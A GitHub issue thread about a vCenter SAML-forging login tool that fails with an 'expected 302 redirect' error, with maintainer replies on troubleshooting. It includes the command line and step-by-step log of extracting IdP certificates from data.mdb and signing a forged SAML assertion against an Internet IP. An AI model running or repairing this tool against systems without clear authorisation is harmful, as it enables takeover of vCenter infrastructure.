An error is reported when the script is running #14
Comments
|
Hello, in newer versions of vCenter they have added a new request parameter that we have not tested well enough that will cause this behavior. If you check out the pull request here, #13, I believe it may address your issue. |
Traceback (most recent call last): |
|
Do you have any additional information about the version of vCenter running? Can you inspect the traffic of a normal login to ensure the requests parameters haven't changed for this version? If they have, you should be able to edit the request to include the necessary so it won't be redirected. |
I'm sorry, this is the test goal of a project I'm responsible for. The owner didn't provide me with any information about vCenter. Because I can't log in, the current information is basically not available |
|
I am getting the 302 redirect error as well. |
This worked :) |
root@kent:~/CVE-2021-22005-exp# python3 vcenter_saml_login.py -p data.mdb -t xxx.xx.xxx.xxx
[] Successfully extracted the IdP certificate
[] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,CN=e4ed3720-803d-4d2e-bbd1-3b5221182357,CN=Ldus,CN=ComponentManager,DC=vsphere,DC=local
[] Domain: vsphere.local
[] Successfully extracted trusted certificate 1
[] Successfully extracted trusted certificate 2
[] Obtaining hostname from vCenter SSL certificate
[] Found hostname vcenter.tech.zone for xxx.xx.xxx.xxx
[] Initiating SAML request with xxx.xx.xxx.xxx
[] Generating SAML assertion
[] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[-] Failed logging in with SAML request
Traceback (most recent call last):
File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 350, in
c = login(args.target, s)
File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 300, in login
raise Exception("expected 302 redirect")
Exception: expected 302 redirect
xxx.xx.xxx.xxx Is an Internet IP
The text was updated successfully, but these errors were encountered: